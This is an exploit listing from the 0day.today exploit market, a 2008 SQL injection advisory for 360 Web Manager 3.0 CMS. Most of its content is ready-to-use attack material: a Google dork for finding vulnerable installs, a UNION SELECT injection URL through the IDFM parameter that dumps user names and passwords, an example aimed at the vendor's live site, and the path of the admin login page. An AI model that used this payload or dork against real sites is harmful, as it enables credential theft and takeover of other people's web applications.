[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability

Author
Ded MustD!e
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2521
Category
web applications
Date add
20-01-2008
Platform
unsorted
======================================================
360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability
======================================================


360 Web Manager CMS Remote SQL Injection Vulnerability

Author: Ded MustD!e

Site: http://www.360webmanager.com/

Google Dork: inurl:"IDFM=" "form.php"

Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*

Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*  =)))

Details: number of columns may be >20, admin panel - http://www.site.com/adm/login.php




#  0day.today [2024-12-24]  #